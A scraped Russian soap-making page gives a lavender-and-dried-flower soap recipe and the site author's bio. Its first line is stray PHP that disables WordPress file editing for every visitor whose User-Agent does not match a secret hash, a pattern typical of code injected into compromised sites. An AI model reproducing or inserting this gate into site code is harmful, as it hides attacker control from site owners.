if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 13 видео советов по приготовлению мыла с лавандой, медом, шоколадом | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

13 видео советов по приготовлению мыла с лавандой, медом, шоколадом

Эта подборка видео познакомит вас, как сделать мыло с различными добавками: медом, шоколадом, апельсином, лимоном, овсянкой, козьим молоком и лавандой

Эта под­бор­ка видео позна­ко­мит вас, как сде­лать мыло с раз­лич­ны­ми добав­ка­ми: медом, шоко­ла­дом, апель­си­ном, лимо­ном, овсян­кой, козьим моло­ком и лаван­дой. Кста­ти, лаван­до­вое мыло с сухо­цве­та­ми — пре­крас­ный рецепт для начи­на­ю­щих, стре­мя­щих­ся постичь увле­ка­тель­ное искус­ство мыло­ва­ре­ния.

Что­бы при­го­то­вить такое мыло доста­точ­но рас­то­пить 100 г про­зрач­ной мыль­ной осно­вы на водя­ной бане, затем доба­вить в еще горя­чий рас­твор 2 ч. лож­ки мас­ла вино­град­ной косточ­ки и 2 кап­ли любо­го кра­си­те­ля (мож­но исполь­зо­вать пище­вой). Разу­ме­ет­ся, для при­да­ния аро­ма­та необ­хо­ди­мо вос­поль­зо­вать­ся эфир­ны­ми мас­ла­ми. В нашем слу­чае в смесь с мыль­ной осно­вой были добав­ле­ны 5 капель лаван­до­во­го мас­ла и 1 кап­ля мас­ла пачу­ли. Важ­но не пере­усерд­ство­вать с кон­цен­тра­ци­ей аро­ма­ти­че­ских веществ, так как их высо­кое содер­жа­ние может пло­хо ска­зать­ся на коже. Затем полу­чив­ший­ся рас­твор пере­ме­шать, вылить поло­ви­ну в фор­му и сбрыз­нуть спир­том, что­бы поверх­ность была глад­кой, и на ней не было пузырь­ков. Оста­нет­ся толь­ко укра­сить заго­тов­ку сухо­цве­та­ми, долить остав­шу­ю­ся мыль­ную осно­ву, вновь обра­бо­тать спир­том и оста­вить на пол­ча­са до пол­но­го засты­ва­ния, после чего мыло мож­но достать и исполь­зо­вать по назначению.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!